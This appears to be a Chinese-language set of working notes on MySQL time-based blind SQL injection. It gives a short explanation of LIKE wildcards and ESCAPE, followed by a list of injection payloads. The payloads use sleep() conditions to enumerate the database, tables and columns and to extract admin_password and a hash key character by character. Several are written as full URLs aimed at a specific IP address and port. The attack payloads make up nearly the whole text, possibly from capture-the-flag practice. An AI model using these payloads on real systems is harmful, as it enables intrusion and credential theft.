mysql中，%代表任意多个字符，_代表一个字符
http://103.238.227.13:10084/index.php?id=1 AND if(database() like "sql%",sleep(3),0)

如果我就真的要查%或者_，怎么办呢？使用escape，转义字符后面的%或_就不作为通配符了，注意前面没有转义字符的%和_仍然起通配符作用
Sql代码  
select username from gg_user where username like '%xiao/_%' escape '/';   
select username from gg_user where username like '%xiao/%%' escape '/';

AND if((select length(user()))=32,sleep(6),0)

select if((select length(admin_password)from feiwa_admin)=32,sleep(4),0);

http://103.238.227.13:10084/index.php?id=1 AND if((SELECT length(admin_password)from feiwa_admin)=32,sleep(6),0);

AND if ((ascii(substr((SELECT table_name from information_schema.TABLES where table_schema=database() limit 0,1) ,1,1))=101) , sleep(3), null)

AND if ((ascii(substr((SELECT table_name from information_schema.TABLES where table_schema=database() limit 0,1) ,1,1))=101) , sleep(3), null)


SELECT if((SELECT length(table_name) from information_schema.TABLES where table_schema=database() limit 0,1)=14,sleep(5),0);

http://103.238.227.13:10084/index.php?id=1 AND if((SELECT length(table_name) from information_schema.TABLES where table_schema=database() limit 0,1)=14,sleep(6),0)


AND if((SELECT table_name from information_schema.TABLES where table_schema=database() limit 0,1) like "fei%",sleep(5),0);


AND if((SELECT length(column_name) from information_schema.columns where table_name=0x68617368 AND table_schema=0x73716c33 limit 0,1)=3,sleep(6),0)

AND IF((SELECT length(`key`) from hash)=32,sleep(6),0)

AND if((SELECT `key` from hash) like "'+data+payloads+'%",sleep(6),0);

AND if((SELECT column_name from information_schema.columns where table_name=0x68617368 AND table_schema=0x73716c33 limit 0,1) like "'+data+payloads+'%",sleep(6),0)

SELECT column_name,column_comment,data_type FROM information_schema.columns WHERE table_name='feiwa_admin' AND table_schema = "feiwa" limit 0,1;

select if((select ascii(substr((SELECT ADMIN_PASSWORD FROM FEIWA_ADMIN),1,1)))=101,sleep(6),0);

AND if((SELECT ascii(substr((SELECT key FROM hash),1,1)))=101,sleep(6),0);

SELECT if((SELECT ascii(substr((SELECT table_name from information_schema.TABLES where table_schema=database() limit 0,1),1,1)))=105,sleep(5),0);

AND if((SELECT `key` from hash) is null,sleep(5),0)